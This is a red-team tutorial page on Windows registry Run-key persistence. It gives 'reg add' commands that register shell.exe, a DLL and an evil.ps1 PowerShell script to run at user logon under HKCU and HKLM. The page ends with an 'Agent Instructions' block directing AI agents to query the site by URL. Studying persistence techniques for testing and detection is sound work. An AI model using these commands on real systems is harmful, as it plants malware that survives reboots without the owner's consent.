# Run Keys Persistence ## Theory A classic and widely used persistence technique involves adding an entry to the **Registry "Run" keys**, causing a specified program to execute automatically when a user logs in. This ensures that the attacker’s payload is launched every time the system starts or a user session begins. #### **Trigger Condition:** The execution of the referenced program occurs when a user logs in to Windows. The specific privilege level of the executed process depends on the security context of the affected user account: * If added under **`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`**, the program runs in the context of the current user. * If added under **`HKLM\Software\Microsoft\Windows\CurrentVersion\Run`**, the program executes for all users on the system, requiring Administrator privileges to modify. This technique is simple, effective, and often overlooked, making it a popular choice for persistence in both malware and post-exploitation scenarios. ## Practice {% hint style="success" %} Registry entries under `HKU/HKCU` will only apply to the user.\ Registry entries under `HKLM` will apply to everyone {% endhint %} {% hint style="info" %} **Run/RunServices** keys will run every time a user logs in. **RunOnce/RunServicesOnce** will clears the registry key as soon as it run. {% endhint %} {% tabs %} {% tab title="Run/RunOnce/RunOnceEx" %} You can force a user to execute a program on logon via the **Run** and **RunOnce** and **RunOnceEx** registry keys. You can use the following registry entries to specify applications to run at logon: * `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` * `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce` * `HKLM\Software\Microsoft\Windows\CurrentVersion\Run` * `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce` * `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx` The **RunOnceEx** key entries can reference programs directly or list them as a dependency. For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx. {% hint style="info" %} RunOnceEx only executes from HKEY\_LOCAL\_MACHINE (HKLM) RunOnceEx clears the registry key on completion of the command. {% endhint %} ```bash #Run/RunOnce ## Add key for current user reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v PeMalware /t REG_SZ /d "C:\Users\user1\shell.exe" ## Add key for computer (all users) reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v PeMalware /t REG_SZ /d "C:\Users\user1\shell.exe" #RunOnceEx #Add key for current user - Execute command / PE reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v PeMalware /t REG_SZ /d "C:\tmp\shell.exe" #Add key for computer (all users) - Execute DLL reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v DLLMalware /t REG_SZ /d "C:\tmp\shell.dll" ``` {% endtab %} {% tab title="RunServices/RunServicesOnce " %} The following Registry keys can control automatic startup of services during boot: * `HKU\\Software\Microsoft\Windows\CurrentVersion\RunServices` * `HKU\\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce` * `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices` * `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce` ```powershell #Add key for current user - Execute command / PE reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe" #Add key for computer (all users) - Execute command / PE reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe" ``` {% endtab %} {% tab title="Policies" %} We can use policy settings to specify startup programs with following registry keys * HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run * HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ```powershell #Add key for current user - Execute command / PE reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe" #Add key for computer (all users) - Execute command reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v Pwned /t REG_SZ /d "powershell.exe C:\tmp\evil.ps1" ``` {% endtab %} {% endtabs %} ## References {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://red.infiltr8.io/redteam/persistence/windows/run-keys.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.